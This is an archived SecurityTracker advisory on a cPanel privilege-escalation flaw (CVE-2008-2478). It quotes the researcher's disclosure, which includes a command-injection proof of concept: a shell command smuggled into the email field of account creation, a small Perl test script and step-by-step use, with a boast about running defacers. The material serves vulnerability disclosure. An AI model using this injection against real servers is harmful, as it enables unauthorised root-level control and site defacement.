SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  cPanel Vendors:  cPanel, Inc.
cPanel Input Validation Flaw in 'Email' Parameter Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1020042
SecurityTracker URL:  http://securitytracker.com/id?1020042
CVE Reference:  CVE-2008-2478   (Links to External Site)
Updated:  May 30 2008
Original Entry Date:  May 19 2008
Impact:  Root access via local system
Exploit Included:  Yes  
Description:  A vulnerability was reported in cPanel. A local user can obtain elevated privileges on the target system.

A local user can invoke the 'wwwact' command and create an account with a specially crafted e-mail address to execute arbitrary commands on the target system with reseller privileges.

Ali Jasbi of IHST security & hacking Research team reproted this vulnerability.
Impact:  A local user can obtain elevated privileges on the target system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.cpanel.net (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  a.jasbi@yahoo.com
Message History:   None.

 Source Message Contents
Date:  18 May 2008 14:45:04 -0000
From:  a.jasbi@yahoo.com
Subject:  Cpanel all version >> root access with a reseller account.

 
By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir
Vendor : Cpanel.net
Version : ALL !!
Risk : Very high
What u can do with this bug is :
u can have a access to all the server with reseller privilege (Th3 r00t)
how it's work ?
when u want to create an account in shell what will happen ?
./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
that u can run it with a web base program ! ( cpanel : doamin:2086)
example :
http://domain:2086/scripts/wwwacct  [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your c
ommand now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on  the web base program.what u need to do is just write ali@hackerz.ir;./
home/hackerz/public_html/do.pl
 in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1

Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
step 2 

make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3

create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the "create" button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit's or everything that u want).
Enjoy it...


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC